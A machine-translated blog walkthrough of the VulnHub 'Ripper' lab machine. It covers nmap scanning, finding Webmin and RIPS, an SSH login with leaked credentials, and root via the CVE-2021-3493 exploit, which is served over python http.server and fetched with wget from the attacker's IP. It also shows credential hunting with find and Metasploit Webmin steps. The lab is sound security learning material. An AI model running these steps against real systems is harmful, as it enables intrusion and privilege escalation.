当前位置:网站首页>Ripper of vulnhub
Ripper of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
One 、nmap Scan surviving hosts
Two 、 Service version detection
3、 ... and 、 information gathering
Four 、 Internal system information leakage
6、 ... and 、0day Raise the right
1. Upload, compile and execute
7、 ... and 、 Normal right raising
2. lookup cubes Related documents
One 、nmap Scan surviving hosts
1. Half open scan
nmap -sS ip
2. Full open scan
nmap -sT ip
3. be based on ping Scan
nmap -sP ip
4. be based on arp Scan
nmap -PR ip
5. nothing ping scanning
nmap -PN 192.168.152.130
Two 、 Service version detection
22,80 Or two commonly used services ,10000 The port is open webmin
Webmin Is the most powerful based on Web Of Unix System management tools . Administrator access through browser Webmin And complete the corresponding management actions .Webmin Support the vast majority of Unix System , These systems are in addition to various versions of linux In addition to :AIX、HPUX、Solaris、Unixware、Irix and FreeBSD etc. .
3、 ... and 、 information gathering
80 The port has no useful information for us to break through the boundary
But in 10000 We found a port webmin Login box for
1.webmin Login box for
2.robots.txt file
3. Trying to decrypt
we scan php codes with rips
4.rips
RIPS Is a good static source code analysis tool , Mainly used for excavation PHP Program vulnerabilities . And it's a web Interface , visit rips Start using . Try to visit .
In the end in 80 We see this under the port rips
Four 、 Internal system information leakage
5、 ... and 、ssh Connect
Try logging in here webmin The background result is not good . Try to make use of ssh Login successful ,
6、 ... and 、0day Raise the right
Because after the release of this target plane ,unbuntu There is a loophole for raising rights . So we can use it directly .
Hole number :cve-2021-3493
1. Upload, compile and execute
The target host has no compilation environment , Precompile
gcc exploit.c -o exp
Turn on http service
python3 -m http.server 80
download
wget http://192.168.0.106/exp
Give power
chmod 777 exp
perform
./exp
7、 ... and 、 Normal right raising
1. firefox
I saw another Firefox browser , It's no use fiddling .
2. lookup cubes Related documents
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
This order is {} It is used to receive results
This is used to escape ; Of
After searching , Got a password , Guess it is cubes Of
3.su become cubes
4.find Search for
Find and cubes dependent , And filter out useless
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
In the log file, we found admin Account and password
5. Sign in webmin backstage
Because we got the account and password of the administrator , Again because webmin Is to control the linux Terminal web‘ application ’, So I have got the highest permission after logging in .
8、 ... and 、msf
Just to get familiar with the usage , because msf Of rce The module also needs an account and password , But with the account and password, we can get the administrator permission directly
msfconsole
search webmin
use 2
show options
Set all parameters
Here also need to set
set ssl true
边栏推荐
- Groovy测试类 和 Junit测试
- Program process management tool -go Supervisor
- Kubernetes 三打探针及探针方式
- C language utf8toutf16 (UTF-8 characters are converted to hexadecimal encoding)
- 如何将数字字符串转换为整数
- Gut | 香港中文大学于君组揭示吸烟改变肠道菌群并促进结直肠癌(不要吸烟)
- PHP server interacts with redis with a large number of close_ Wait analysis
- ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
- vulnhub之raven2
- The world's most popular font editor FontCreator tool
猜你喜欢
一文搞懂Go语言Context
Mmc5603nj geomagnetic sensor (Compass example)
Numpy np. Max and np Maximum implements the relu function
Extrapolated scatter data
rxjs Observable filter Operator 的实现原理介绍
【学习笔记】dp 状态与转移
错排问题 (抽奖,发邮件)
鸿蒙第四次培训
Based on MCU, how to realize OTA differential upgrade with zero code and no development?
AOSP ~ NTP ( 网络时间协议 )
随机推荐
量化计算调研
聊聊Flink框架中的状态管理机制
Solicitation for JGG special issue: spatio-temporal omics
牛牛的组队竞赛
Mysql根据时间搜索常用方法整理
How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
剑指offer专项32-96题做题笔记
ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
2022年湖南工学院ACM集训第二次周测题解
Sheet1$.输出[Excel 源输出].列[XXX] 出错。返回的列状态是:“文本被截断,或者一个或多个字符在目标代码页中没有匹配项。”。
Analysis of EPS electric steering system
Event preview | the live broadcast industry "rolled in" to drive new data growth points with product power
repo ~ 常用命令
STL教程10-容器共性和使用场景
ASP. Net hotel management system
DNS多点部署IP Anycast+BGP实战分析
VS2015的下载地址和安装教程
uniapp实现点击加载更多
Machine learning 3.2 decision tree model learning notes (to be supplemented)
This article explains the complex relationship between MCU, arm, MCU, DSP, FPGA and embedded system